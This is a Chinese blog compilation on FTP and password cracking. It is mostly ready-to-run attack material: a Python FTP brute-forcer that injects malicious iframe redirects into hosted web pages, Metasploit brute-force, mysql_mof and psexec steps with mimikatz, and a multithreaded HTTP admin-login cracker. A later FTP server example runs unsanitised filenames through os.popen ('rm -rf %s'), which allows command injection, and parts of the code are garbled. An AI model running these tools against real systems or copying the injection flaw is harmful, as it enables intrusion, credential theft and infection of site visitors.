本文将为您提供关于笔记整理2——python实现ftp口令爆破的详细介绍,我们还将为您解释pythonftp爆破的相关知识,同时,我们还将为您提供关于msf各种弱口令爆破、python写的http后台
本文将为您提供关于笔记整理2——python实现ftp口令爆破的详细介绍,我们还将为您解释python ftp爆破的相关知识,同时,我们还将为您提供关于msf各种弱口令爆破、python 写的http后台弱口令爆破工具、Python 实现 FTP 弱口令扫描器、python 实现ftp服务 简介的实用信息。
本文目录一览:- 笔记整理2——python实现ftp口令爆破(python ftp爆破)
- msf各种弱口令爆破
- python 写的http后台弱口令爆破工具
- Python 实现 FTP 弱口令扫描器
- python 实现ftp服务 简介
笔记整理2——python实现ftp口令爆破(python ftp爆破)
一.主要思路:
(1).匿名登陆模块:
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login(''anonymous'', ''me@your.com'')
有的ftp服务器开启了匿名登录服务,则可以使用该账号密码进行登陆
user:''anonymous'',
password: ''me@your.com''
(2).密码和口令爆破模块
def bruteLogin(hostname, passwdFile):
pF = open(passwdFile, ''r'')
for line in pF.readlines():
''''''''''''
''''''''''''
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, passWord)
可以通过收集的字典进行爆破
(3).查找默认页面
登陆上ftp服务后,客户以通过ftp.nlst()方法查找所有文件的名字,
遍历找寻index.htm,index.asp等文件。
def returnDefault(ftp):
try:
dirList = ftp.nlst()
找到后返回其文件名列表
(4).注入恶意代码
通过找到的文件名将其文件下载下来,注入重定向代码,使访问该服务器的
用户都重定向到我们的攻击机上的index页面,从而对浏览器发动攻击
def injectPage(ftp, page, redirect):
f = open(page + ''.tmp'', ''w'')
ftp.retrlines(''RETR '' + page, f.write)
print ''[+] Downloaded Page: '' + page
''''''''''''''''''''
(5).整合全部的攻击,写成一个函数
登录,遍历文件,上传覆盖,完成对目标服务器的攻击。
难点在与登录成功。(验证了信息收集的重要性)
def attack(username,password,tgtHost,redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username, password)
defPages = returnDefault(ftp)
注意的是返回的index因该不止一个。
(6).关于连接肉机的说明
这部分攻击是有我们已获得的恶意服务器进行对用户浏览器的攻击,
主要通过浏览器的漏洞利用代码,当用户访问该服务器时,用户浏览器
会被注入恶意代码,从而向恶意服务器建立一个反向的shell。获得批量肉机。
具体实现尚未学习,可用metasploit框架中的漏洞利用代码。参考攻击
谷歌的极光行动。
3.主要利用模块
import ftplib
import optparse
import time
4.主要利用函数
def anonLogin(hostname):
def bruteLogin(hostname, passwdFile):
def returnDefault(ftp):
def injectPage(ftp, page, redirect):
def attack(username,password,tgtHost,redirect):
5.复习收获与总结
(1).端口映射的内容
https://baike.baidu.com/item/%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84/98247?fr=aladdin
二.代码
#!/usr/bin/python
# -*- coding: utf-8 -*-
import ftplib
import optparse
import time
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login(''anonymous'', ''me@your.com'')
print ''\n[*] '' + str(hostname) \
+ '' FTP Anonymous Logon Succeeded.''
ftp.quit()
return True
except Exception, e:
print ''\n[-] '' + str(hostname) +\
'' FTP Anonymous Logon Failed.''
return False
def bruteLogin(hostname, passwdFile):
pF = open(passwdFile, ''r'')
for line in pF.readlines():
time.sleep(1)
userName = line.split('':'')[0]
passWord = line.split('':'')[1].strip(''\r'').strip(''\n'')
print ''[+] Trying: '' + userName + ''/'' + passWord
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, passWord)
print ''\n[*] '' + str(hostname) +\
'' FTP Logon Succeeded: ''+userName+''/''+passWord
ftp.quit()
return (userName, passWord)
except Exception, e:
pass
print ''\n[-] Could not brute force FTP credentials.''
return (None, None)
def returnDefault(ftp):
try:
dirList = ftp.nlst()
except:
dirList = []
print ''[-] Could not list directory contents.''
print ''[-] Skipping To Next Target.''
return
retList = []
for fileName in dirList:
fn = fileName.lower()
if ''.php'' in fn or ''.htm'' in fn or ''.asp'' in fn:
print ''[+] Found default page: '' + fileName
retList.append(fileName)
return retList
def injectPage(ftp, page, redirect):
f = open(page + ''.tmp'', ''w'')
ftp.retrlines(''RETR '' + page, f.write)
print ''[+] Downloaded Page: '' + page
f.write(redirect)
f.close()
print ''[+] Injected Malicious IFrame on: '' + page
ftp.storlines(''STOR '' + page, open(page + ''.tmp''))
print ''[+] Uploaded Injected Page: '' + page
def attack(username,password,tgtHost,redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username, password)
defPages = returnDefault(ftp)
for defPage in defPages:
injectPage(ftp, defPage, redirect)
def main():
parser = optparse.OptionParser(''usage %prog ''+\
''-H <target host[s]> -r <redirect page>''+\
''[-f <userpass file>]'')
parser.add_option(''-H'', dest=''tgtHosts'',\
type=''string'', help=''specify target host'')
parser.add_option(''-f'', dest=''passwdFile'',\
type=''string'', help=''specify user/password file'')
parser.add_option(''-r'', dest=''redirect'',\
type=''string'',help=''specify a redirection page'')
(options, args) = parser.parse_args()
tgtHosts = str(options.tgtHosts).split('','')
passwdFile = options.passwdFile
redirect = options.redirect
if tgtHosts == None or redirect == None:
print parser.usage
exit(0)
for tgtHost in tgtHosts:
username = None
password = None
if anonLogin(tgtHost) == True:
username = ''anonymous''
password = ''me@your.com''
print ''[+] Using Anonymous Creds to attack''
attack(username, password, tgtHost, redirect)
elif passwdFile != None:
(username, password) =\
bruteLogin(tgtHost, passwdFile)
if password != None:
''[+] Using Creds: '' +\
username + ''/'' + password + '' to attack''
attack(username, password, tgtHost, redirect)
if __name__ == ''__main__'':
main()
msf各种弱口令爆破
Msf:
写的很乱 记录下msf各个爆破弱口令的模块
run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 检测在线主机
metasploit 增加路由
route add 10.10.1.3 255.255.255.0 1
使用扫描模块
use scanner/portscan/tcp
爆破ssh
Msf>use auxiliary/scanner/ssh/ssh_login
爆破ftp
Msf>use auxiliary/scanner/ftp/ftp_login
爆破telnet
Msf>use auxiliary/scanner/telnet/telnet_login
爆破smb
auxiliary/scanner/smb/smb_login
爆破Mysql
use scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt
使用mof模块进行权限获取
use windows/mysql/mysql_mof
msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3
rhost => 10.10.1.3
msf exploit(windows/mysql/mysql_mof) > set USERNAME root
USERNAME => root
msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/mysql/mysql_mof) > exploit
Mimikatz导出hash
meterpreter > load mimikatz
meterpreter > kerberos
一些域内的命令
查看域
net view /domain
查看当前域中的计算机
net view
查看CORP域中的计算机
net view /domain:CORP
Ping计算机名可以得到IP
ping Wangsong-PC
获取所有域的用户列表
net user /domain
获取域用户组信息
net group /domain
获取当前域管理员信息
net group "domain admins" /domain
查看域时间及域服务器的名字
net time /domain
net time /domain 就可以知道域的计算机名
WIN-723O786H6KU.moonsec.com 10.10.1.2 这个就是域控
net group "domain admins" /domain
反弹shell
msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit
python 写的http后台弱口令爆破工具
今天来弄一个后台破解的python小程序,哈哈,直接上代码吧,都有注释~~
# -*- coding: utf-8 -*- # 利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很# 容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任) import urllib2 import urllib import httplib import threading headers = {"Content-Type":"application/x-www-form-urlencoded", "Connection":"Keep-Alive", "Referer":"http://www.xxxxx.com/"};# referer:是代理的访问来源地址 # lock = threading.Lock() def tryUser(user,password): #print user,password global headers global outFile conn = httplib.HTTPConnection("www.xxxxx.com") # 远程域名 if len(user) < 3: # 限制用户名长度,排除字典中的无用数据 return # 主动退出线程 else: #lock.acquire() # 多线程操作文件,提前加锁,用后释放 #line = inFile.readline() #userData = line.strip().split(' # ') # strip() 默认去除空白字符包括' ','\t','\n'等 #lock.release() user = user.strip() passwd = password.strip() params = urllib.urlencode({'username': user, 'password': passwd}) conn.request(method="POST", url="/users/login", body=params, headers=headers) # 后台路径 responseText = conn.getresponse().read().decode('utf8') # 网页编码 #print responseText # 第一次可以打印看看是否解析 if not responseText.find(u'用户名或者密码不正确,请重新输入!') > 0 : print '----- find user:', user, 'with password:', passwd, '-----' outFile.write(user + ' ' + passwd + '\n') return outFile = open('accounts-cracked.txt', 'w') if __name__ == '__main__': tsk=[] # 创建线程池 with open(r'user.dic', 'r') as fUser: # 使用with as 来打开文件,不需自己关闭文件,因为他会自己在合适的时候自已关闭(类似C# 中的using(...){}接口) with open(r'pass.dic', 'r') as fPass: for user in fUser.readlines(): for password in fPass.readlines(): t= threading.Thread(target = tryUser,args=(user,password)) t.daemon = False # 设置不进行进程守护 tsk.append(t) # t.start() fPass.seek(0) # 记住这里要将文件重新移到文件首,不然就会出现只执行外层循环的第一条,因为内层在 # 迭代之后(readlines()是迭代器的形式,迭代一次后文件指针就指到文件尾了,迭代器 # 也是end了)第二次就没有password 在 fPass中,也就是说 for password in fPass.readlines(): # 为空,所以这里的内层循环就不会被执行了,因此也就是迭代器清零的问题(C ++ itertor 常有) # join()无参数就是完全阻塞主线程,等待线程执行完 有参数就是说, # 在主线程等待一秒后就不阻塞线程了,继续执行主线程,这里的意思是一秒钟开一个线程 # 不能再thread start之前调用join(), 因为join() 是线程运行时调度 for t in tsk: t.start() t.join(1) print "All thread OK,maybe not " outFile.close()
Python 实现 FTP 弱口令扫描器
一、项目说明
1.1 项目简介
本次实验通过使用 Python 实现一个 FTP 弱口令扫描器开始,入门 Python 渗透测试技术,实验涉及 FTP 协议原理,ftplib 库的使用等知识点。
本教程由作者向实验楼投稿发布,完整教程及在线练习地址:Python 实现 FTP 弱口令扫描器
1.2 目标学员
具有Python语言基础,不会的同学请到隔壁班先去学一下
1.3 Python版本
Python3.x
1.4 知识点
本实验涉及如下知识点:
认识Ftp服务器
Ftplib库的使用
argparse库的使用
Ubuntu下Ftp服务器的搭建
1.5 效果图
本节实验将实现如下功能的 FTP 弱口令扫描器:
二、 理论基础
以下内容整理自百度百科,参考链接:
百度百科-FTP服务器
2.1 FTP服务器
FTP服务器(File Transfer Protocol Server)是在互联网上提供文件存储和访问服务的计算机,它们依照FTP协议提供服务。 FTP是File Transfer Protocol(文件传输协议)。顾名思义,就是专门用来传输文件的协议。简单地说,支持FTP协议的服务器就是FTP服务器。
FTP是仅基于TCP的服务,不支持UDP。与众不同的是FTP使用2个端口,一个数据端口和一个命令端口(也可叫做控制端口)。通常来说这两个端口是21(命令端口)和20(数据端口)。但FTP 工作方式的不同,数据端口并不总是20。这就是主动与被动FTP的最大不同之处。主要有两种工作模式:
主动FTP
FTP服务器的控制端口是21,数据端口是20,所以在做静态映射的时候只需要开放21端口即可,他会用20端口和客户端主动的发起连接。
被动FTP
服务器的控制端口是21,数据端口是随机的,且是客户端去连接对应的数据端口,所以在做静态的映射话只开放21端口是不可以的。此时需要做DMZ。
2.2 Ftp扫描器实现方案
本课程开发Ftp扫描器主要从以下两个方面着手:
扫描匿名Ftp
Ftp匿名登录的扫描主要应用于批量扫描中,单独针对一个Ftp服务器进行扫描的话成功几率比较小,不过也不排除成功的可能。估计讲到这里的时候,有的同学就有疑问了!!!现在还有人不设置密码吗?那得傻到啥程度?用东北的话来说那不就是傻狍子吗!!!(开个玩笑,免得同学们看我的教程睡着了!)不过言归正传,很多网站都开放Ftp服务方便用户下载资源(这个允许匿名登录不足为奇),更疯狂的是网站管理人员为了方便网站访问软件的更新也开放了Ftp匿名登录(估计不是自己家的网站......)。这样就给了我们很多机会,尤其后者的服务器很容易就受到攻击,后期我会讲解Ftp目录下可以搜到web页面之后怎样拿到Shell(大家多多关注我的教程吧,还有很多精品课程等着你!)。
扫描Ftp弱口令
Ftp弱口令扫描其实就是暴力破解,为何我们不称为暴力破解呢?因为我们只是扫描一些简单的密码组合,并不是所有可能得密码组合,而且我们也没有那么多时间去暴力破解,谁让我们活不了成千上万年呢!只是一个密码而已,弱口令扫不到就算了,天涯何处无芳草何必单恋一枝花呢!不过你要非喜欢这个Ftp服务器的话,以后我再教大家别的方法渗透服务器!
三、代码实现
3.1 Ftp匿名扫描器的实现
这里我们要用到Python的ftplib库中的Ftp这个类,Ftp这个类实现了Ftp客户端的大多数功能,比如连接Ftp服务器、查看服务器中的文件、上传、下载文件等功能,详细用法可以查看一下文档,以后碰到问题也要养成先看文档的习惯!接下来我们来定义anonScan(hostname)这个函数以实现扫描可匿名登录的Ftp服务器。代码如下:
#匿名登录扫描
def anonScan(hostname): #参数是主机名
try:
with FTP(hostname) as ftp: #创建Ftp对象
ftp.login() #Ftp匿名登录
print(''\n[*] '' + str(hostname) + " FTP Anonymous login successful!") #不抛出异常则表明登录成功
return True
except Exception as e: #抛出异常则表明匿名登录失败
print(''\n[-] '' + str(hostname) + " FTP Anonymous logon failure!")
return False
代码很简短,主要在注释中解释了代码的含义。这里说一下这个函数的思路,首先用主机名构造了一个Ftp对象(即ftp),然后用这个ftp调用不带任何参数的login()函数即表示要匿名登录这个Ftp服务器,如果登录过程中没有产生异常,则表明匿名登录成功,否则匿名登录失败!
3.2 Ftp弱口令的扫描
Ftp弱口令的扫描依赖于用户名和密码字典,我们的实验环境中会提供 pwd.txt
作为密码字典,字典的格式如下图所示:
接下来我们针对字典中的格式来实现Ftp弱口令的扫描,代码如下:
#暴力破解
def vlcLogin(hostname, pwdFile): #参数(主机名,字典文件)
try:
with open(pwdFile, ''r'') as pf: #打开字典文件
for line in pf.readlines(): #循环读取字典文件中的每一行
time.sleep(1) #等待1秒
userName = line.split('':'')[0] #从读取的内容中取出用户名
passWord = line.split('':'')[1].strip(''\r'').strip(''\n'') #从读取的内容中取出密码
print(''[+] Trying: '' + userName + '':'' + passWord)
try:
with FTP(hostname) as ftp: #以主机名为参数构造Ftp对象
ftp.login(userName, passWord) #使用读取出的用户名密码登录Ftp服务器
#如果没有产生异常则表示登录成功,打印主机名、用户名和密码
print(''\n[+] '' + str(hostname) + '' FTP Login successful: ''+ \
userName + '':'' + passWord)
return (userName, passWord)
except Exception as e:
# 产生异常表示没有登录成功,这里我们不用管它,继续尝试其他用户名、密码
pass
except IOError as e:
print(''Error: the password file does not exist!'')
print(''\n[-] Cannot crack the FTP password, please change the password dictionary try again!'')
return (None,None)
这段代码其实就是循环从字典中读取用户名和密码并尝试登陆,登陆成功则表明找到用户名和密码。由于这个函数将主机名定义成了可以用“,”分割的字符串。找到密码并不会终止程序,而是会继续扫描其他主机的弱口令,直到所有的主机都扫描一遍。
3.3 命令行解析
至此我们的Ftp扫描器已经几乎完成了,代码并不多,也很简单。现在我们需要做的是让我们的脚本可以处理命令行输入,以控制扫描哪些主机。处理命令行参数我们将用到Python中的argparse库,这个库是Python中自带的模块,处理命令行将变得非常简单,下面我们一起见证一下argparse的强大之处,先上代码:
# 这里用描述创建了ArgumentParser对象
parser = argparse.ArgumentParser(description = ''FTP Scanner'')
# 添加-H命令dest可以理解为咱们解析时获取-H参数后面值的变量名,help是这个命令的帮助信息
parser.add_argument(''-H'',dest=''hostName'',help=''The host list with ","space'')
parser.add_argument(''-f'',dest=''pwdFile'',help=''Password dictionary file'')
options = None
try:
options = parser.parse_args()
except:
print(parser.parse_args([''-h'']))
exit(0)
hostNames = str(options.hostName).split('','')
pwdFile = options.pwdFile
通过argparse库来解析命令行参数,可以根据添加参数时指定的help关键字的内容来自动生成帮助文档。具体效果如下图所示:
在处理复杂命令的时候argparse的强大就更明显了,由于这个属于Python基础,所以Python库中自带的库这里我就不做过多的介绍了。
四、实验环境搭建测试
本项目完整代码和环境搭建、测试,可在实验楼中查看并在线完成。
五、总结
本次项目实现了Ftp弱口令扫描器,主要用到以下知识点:
Ftp服务器的基本概念
使用ftplib如何一步一步的实现Ftp弱口令扫描器
使用argparse解析命令行参数
实验环境的搭建方法
六、参考文献
《Python绝技--运用Python成为顶级黑客》
《Python黑帽子-- 黑客与渗透测试编程之道 》
注:本系列项目教学思路,参考自《Python绝技--运用Python成为顶级黑客》,书中代码和教学思路只做参考,本系列教程全部重新设计并基于Python3.x重写。本系列课程旨在教大家渗透测试,维护网络安全,如用于非法目的,自行承担法律责任!
python 实现ftp服务 简介
目录
一. Python搭建FTP服务器
二. FTP函数释义
三. 查看目录结构
四. 上传下载程序
一. Python搭建FTP服务器
1. 搭建FTP服务器的Server端
# -*- coding:utf-8 -*-
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
# 实例化DummyAuthorizer来创建ftp用户
authorizer = DummyAuthorizer()
# 参数:用户名,密码,目录,权限
authorizer.add_user('admin','123456',r'C:\Users\Administrator\Desktop\ftp',perm='elradfmwMT')
# 匿名登录
# authorizer.add_anonymous('/home/nobody')
handler = FTPHandler
handler.authorizer = authorizer
# 参数:IP,端口,handler
server = FTPServer(('0.0.0.0',2121),handler) #设置为0.0.0.0为本机的IP地址
server.serve_forever()
2. FTP服务器的客户端连接
# -*- coding: utf-8 -*-
from ftplib import FTP
import time,tarfile,os
#连接ftp
def ftpconnect(host,port,username,password):
ftp = FTP()
# 打开调试级别2,显示详细信息
# ftp.set_debuglevel(2)
ftp.connect(host,port)
ftp.login(username,password)
return ftp
#从ftp下载文件
def downloadfile(ftp,remotepath,localpath):
# 设置的缓冲区大小
bufsize = 1024
fp = open(localpath,'wb')
ftp.retrbinary('RETR ' + remotepath,fp.write,bufsize)
ftp.set_debuglevel(0)# 参数为0,关闭调试模式
fp.close()
#从本地上传文件到ftp
def uploadfile(ftp,localpath):
bufsize = 1024
fp = open(localpath,'rb')
ftp.storbinary('STOR ' + remotepath,fp,bufsize)
ftp.set_debuglevel(0)
fp.close()
if __name__ == "__main__":
#host,password
ftp = ftpconnect("192.168.10.113",2121,"admin","123456")
#下载文件,第一个是ftp服务器路径下的文件,第二个是要下载到本地的路径文件
downloadfile(ftp,"/12.mp3",r"C:\Users\Administrator\Desktop\ftp\download\test.mp3")
# 上传文件,第一个是要上传到ftp服务器路径下的文件,第二个是本地要上传的的路径文件
uploadfile(ftp,'/upload/1.txt',"C:/Users/Administrator/Desktop/1.txt")
# ftp.close() #关闭ftp
# #调用本地播放器播放下载的视频
# os.system('start D:\soft\kugou\KGMusic\KuGou.exe C:\Users\Administrator\Desktop\ftp\test.mp3')
print(ftp.getwelcome())# 打印出欢迎信息
# 获取当前路径
pwd_path = ftp.pwd()
print("FTP当前路径:",pwd_path)
# 显示目录下所有目录信息
# ftp.dir()
# 设置FTP当前操作的路径
ftp.cwd('/upload/')
# 返回一个文件名列表
filename_list = ftp.nlst()
print(filename_list)
ftp.mkd('目录名')# 新建远程目录
ftp.rmd('目录名') # 删除远程目录
ftp.delete('文件名') # 删除远程文件
ftp.rename('fromname','toname') # 将fromname修改名称为toname
# 逐行读取ftp文本文件
file = '/upload/1.txt'
# ftp.retrlines('RETR %s' % file)
#与 retrlines()类似,只是这个指令处理二进制文件。回调函数 cb 用于处理每一块(块大小默认为 8KB)下载的数据
# ftp.retrbinary('RETR %s' % file)
二. FTP函数释义
Python中默认安装的ftplib模块定义了ftp类,其中函数有限,可用来实现简单的ftp客户端,用于上传或下载文件,函数列举如下
ftp登陆连接
from ftplib import FTP #加载ftp模块
ftp=FTP() #设置变量
ftp.set_debuglevel(2) #打开调试级别2,显示详细信息
ftp.connect("IP","port") #连接的ftp sever和端口
ftp.login("user","password") #连接的用户名,密码
print ftp.getwelcome() #打印出欢迎信息
ftp.cmd("xxx/xxx") #进入远程目录
bufsize=1024 #设置的缓冲区大小
filename="filename.txt" #需要下载的文件
file_handle=open(filename,"wb").write #以写模式在本地打开文件
ftp.retrbinaly("RETR filename.txt",file_handle,bufsize) #接收服务器上文件并写入本地文件
ftp.set_debuglevel(0) #关闭调试模式
ftp.quit() #退出ftp
ftp相关命令操作
ftp.cwd(pathname) #设置FTP当前操作的路径
ftp.dir() #显示目录下所有目录信息
ftp.nlst() #获取目录下的文件
ftp.mkd(pathname) #新建远程目录
ftp.pwd() #返回当前所在位置
ftp.rmd(dirname) #删除远程目录
ftp.delete(filename) #删除远程文件
ftp.rename(fromname,toname)#将fromname修改名称为toname。
ftp.storbinaly("STOR filename.txt",file_handel,bufsize) #上传目标文件
ftp.retrbinary("RETR filename.txt",bufsize) #下载FTP文件
FTP.quit()与FTP.close()的区别
FTP.quit():发送QUIT命令给服务器并关闭掉连接。这是一个比较“缓和”的关闭连接方式,但是如果服务器对QUIT命令返回错误时,会抛出异常。
FTP.close():单方面的关闭掉连接,不应该用在已经关闭的连接之后,例如不应用在FTP.quit()之后。
FTP对象方法说明
login(user=’anonymous’,passwd=”,acct=”) 登录 FTP 服务器,所有参数都是可选的
pwd() 获得当前工作目录
cwd(path) 把当前工作目录设置为 path 所示的路径
dir ([path[,…[,cb]]) 显示 path 目录里的内容,可选的参数 cb 是一个回调函数,会传递给 retrlines()方法
nlst ([path[,…]) 与 dir()类似, 但返回一个文件名列表,而不是显示这些文件名
retrlines(cmd [,cb]) 给定 FTP命令(如“ RETR filename”),用于下载文本文件。可选的回调函数 cb 用于处理文件的每一行
retrbinary(cmd,cb[,bs=8192[,ra]]) 与 retrlines()类似,只是这个指令处理二进制文件。回调函数 cb 用于处理每一块(块大小默认为 8KB)下载的数据
storlines(cmd,f) 给定 FTP 命令(如“ STOR filename”),用来上传文本文件。要给定一个文件对象 f
storbinary(cmd,f,[,bs=8192]) 与 storlines()类似,只是这个指令处理二进制文件。要给定一个文件对象 f,上传块大小 bs 默认为 8KB
rename(old,new) 把远程文件 old 重命名为 new
delete(path) 删除位于 path 的远程文件
mkd(directory) 创建远程目录
rmd(directory) 删除远程目录
quit() 关闭连接并退出
三. 查看目录结构
ftp.dir() 能显示目录下的文件信息,考虑到要分别对文件夹个数和文件数目进行统计,文件夹下存在文件夹和文件嵌套;将dir()后的目录信息放入列表,对列表进行操作;进入子文件夹后进行递归调用操作。
# -*- coding: utf-8 -*-
from ftplib import FTP
ftp = FTP()
ftp.connect('132.121.xx.xxx','xx909')
ftp.login('crmyun_xxx','wyjjjjxJ')
sum1 = 0
sum2 = 0
value = 0
def search_file(start_dir):
ftp.cwd(start_dir)
print ftp.pwd()
dir_res = []
ftp.dir('.',dir_res.append) #对当前目录进行dir(),将结果放入列表
for i in dir_res:
if i.startswith("d"):
global sum1
sum1 += 1
search_file(ftp.pwd()+"/"+i.split(" ")[-1])
ftp.cwd('..')
else:
global sum2,value
sum2 += 1
val = i.split(" ")[-1]
value += ftp.size(val)
if ftp.pwd().endswith('/'):
# print ftp.pwd()+val+" "+str(ftp.size(val))+" B" #打印出每个文件路径和大小
pass
else:
# print ftp.pwd()+"/"+val+" "+str(ftp.size(val))+" B"
pass
def sum_file(file_path):
search_file(file_path)
print "folder number is "+str(sum1)+",file number is "+str(sum2)+",Totle size is "+str(value)+" B"
if __name__ == '__main__':
sum_file("/apps/crmyun/crmyun_755")
展示结果:
四. 上传下载程序
完整上传程序
Python中默认安装的ftplib模块定义了ftp类,其中函数有限,可用来实现简单的ftp客户端,用于上传或下载文件
# coding: utf-8
from ftplib import FTP
import time
import tarfile
import os
# !/usr/bin/python
# -*- coding: utf-8 -*-
from ftplib import FTP
def ftpconnect(host,password):
ftp = FTP()
# ftp.set_debuglevel(2)
ftp.connect(host,21)
ftp.login(username,password)
return ftp
#从ftp下载文件
def downloadfile(ftp,localpath):
bufsize = 1024
fp = open(localpath,'wb')
ftp.retrbinary('RETR ' + remotepath,bufsize)
ftp.set_debuglevel(0)
fp.close()
#从本地上传文件到ftp
def uploadfile(ftp,'rb')
ftp.storbinary('STOR ' + remotepath,bufsize)
ftp.set_debuglevel(0)
fp.close()
if __name__ == "__main__":
ftp = ftpconnect("113.105.139.xxx","ftP***","Guest***")
downloadfile(ftp,"Faint.mp4","C:/Users/Administrator/Desktop/test.mp4")
#调用本地播放器播放下载的视频
os.system('start "C:\Program Files\Windows Media Player\wmplayer.exe" "C:/Users/Administrator/Desktop/test.mp4"')
uploadfile(ftp,"C:/Users/Administrator/Desktop/test.mp4","test.mp4")
ftp.quit()
server main 代码:
# _*_ coding:utf-8 _*_
import os,sys,json,hashlib,socketserver,time
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(base_dir)
from conf import userdb_set
class Ftp_server(socketserver.BaseRequestHandler):
user_home_dir = ''
def auth(self,*args):
'''验证用户名及密码'''
cmd_dic = args[0]
username = cmd_dic["username"]
password = cmd_dic["password"]
f = open(userdb_set.userdb_set(),'r')
user_info = json.load(f)
if username in user_info.keys():
if password == user_info[username]:
self.request.send('0'.encode())
os.chdir('/home/%s' % username)
self.user_home_dir = os.popen('pwd').read().strip()
data = "%s login successed" % username
self.loging(data)
else:
self.request.send('1'.encode())
data = "%s login Failed" % username
self.loging(data)
f.close
else:
self.request.send('1'.encode())
data = "%s login Failed" % username
self.loging(data)
f.close
##########################################
def get(self,*args):
'''给客户端传输文件'''
request_code = {
'0': 'file is ready to get','1': 'file not found!'
}
cmd_dic = args[0]
self.loging(json.dumps(cmd_dic))
filename = cmd_dic["filename"]
if os.path.isfile(filename):
self.request.send('0'.encode('utf-8')) # 确认文件存在
self.request.recv(1024)
self.request.send(str(os.stat(filename).st_size).encode('utf-8'))
self.request.recv(1024)
m = hashlib.md5()
f = open(filename,'rb')
for line in f:
m.update(line)
self.request.send(line)
self.request.send(m.hexdigest().encode('utf-8'))
print('From server:Md5 value has been sended!')
f.close()
else:
self.request.send('1'.encode('utf-8'))
###########################################
def cd(self,*args):
'''执行cd命令'''
user_current_dir = os.popen('pwd').read().strip()
cmd_dic = args[0]
self.loging(json.dumps(cmd_dic))
path = cmd_dic['path']
if path.startswith('/'):
if self.user_home_dir in path:
os.chdir(path)
new_dir = os.popen('pwd').read()
user_current_dir = new_dir
self.request.send('Change dir successfully!'.encode("utf-8"))
data = 'Change dir successfully!'
self.loging(data)
elif os.path.exists(path):
self.request.send('Permission Denied!'.encode("utf-8"))
data = 'Permission Denied!'
self.loging(data)
else:
self.request.send('Directory not found!'.encode("utf-8"))
data = 'Directory not found!'
self.loging(data)
elif os.path.exists(path):
os.chdir(path)
new_dir = os.popen('pwd').read().strip()
if self.user_home_dir in new_dir:
self.request.send('Change dir successfully!'.encode("utf-8"))
user_current_dir = new_dir
data = 'Change dir successfully!'
self.loging(data)
else:
os.chdir(user_current_dir)
self.request.send('Permission Denied!'.encode("utf-8"))
data = 'Permission Denied!'
self.loging(data)
else:
self.request.send('Directory not found!'.encode("utf-8"))
data = 'Directory not found!'
self.loging(data)
###########################################
def rm(self,*args):
request_code = {
'0': 'file exist,and Please confirm whether to rm','1': 'file not found!'
}
cmd_dic = args[0]
self.loging(json.dumps(cmd_dic))
filename = cmd_dic['filename']
if os.path.exists(filename):
self.request.send('0'.encode("utf-8")) # 确认文件存在
client_response = self.request.recv(1024).decode()
if client_response == '0':
os.popen('rm -rf %s' % filename)
self.request.send(('File %s has been deleted!' % filename).encode("utf-8"))
self.loging('File %s has been deleted!' % filename)
else:
self.request.send(('File %s not deleted!' % filename).encode("utf-8"))
self.loging('File %s not deleted!' % filename)
else:
self.request.send('1'.encode("utf-8"))
########################################
def pwd(self,*args):
'''执行pwd命令'''
cmd_dic = args[0]
self.loging(json.dumps(cmd_dic))
server_response = os.popen('pwd').read().strip().encode("utf-8")
self.request.send(server_response)
#############################################
def ls(self,*args):
'''执行ls命名'''
cmd_dic = args[0]
self.loging(json.dumps(cmd_dic))
path = cmd_dic['path']
cmd = 'ls -l %s' % path
server_response = os.popen(cmd).read().encode("utf-8")
self.request.send(server_response)
############################################
def put(self,*args):
'''接收客户端文件'''
cmd_dic = args[0]
self.loging(json.dumps(cmd_dic))
filename = cmd_dic["filename"]
filesize = cmd_dic["size"]
if os.path.isfile(filename):
f = open(filename + '.new','wb')
else:
f = open(filename,'wb')
request_code = {
'200': 'Ready to recceive data!','210': 'Not ready to received data!'
}
self.request.send('200'.encode())
receive_size = 0
while True:
if receive_size < filesize:
data = self.request.recv(1024)
f.write(data)
receive_size += len(data)
else:
data = "File %s has been uploaded successfully!" % filename
self.loging(data)
print(data)
break
################################################
def mkdir(self,*args):
request_code = {
'0': 'Directory has been made!','1': 'Directory is aleady exist!'
}
cmd_dic = args[0]
self.loging(json.dumps(cmd_dic))
dir_name = cmd_dic['dir_name']
if os.path.exists(dir_name):
self.request.send('1'.encode("utf-8"))
else:
os.popen('mkdir %s' % dir_name)
self.request.send('0'.encode("utf-8"))
#############################################
def loging(self,data):
'''日志记录'''
localtime = time.asctime(time.localtime(time.time()))
log_file = '/root/ftp/ftpserver/log/server.log'
with open(log_file,'a',encoding='utf-8') as f:
f.write('%s-->' % localtime + data + '\n')
##############################################
def handle(self):
# print("您本次访问使用的IP为:%s" %self.client_address[0])
# localtime = time.asctime( time.localtime(time.time()))
# print(localtime)
while True:
try:
self.data = self.request.recv(1024).decode() #
# print(self.data)
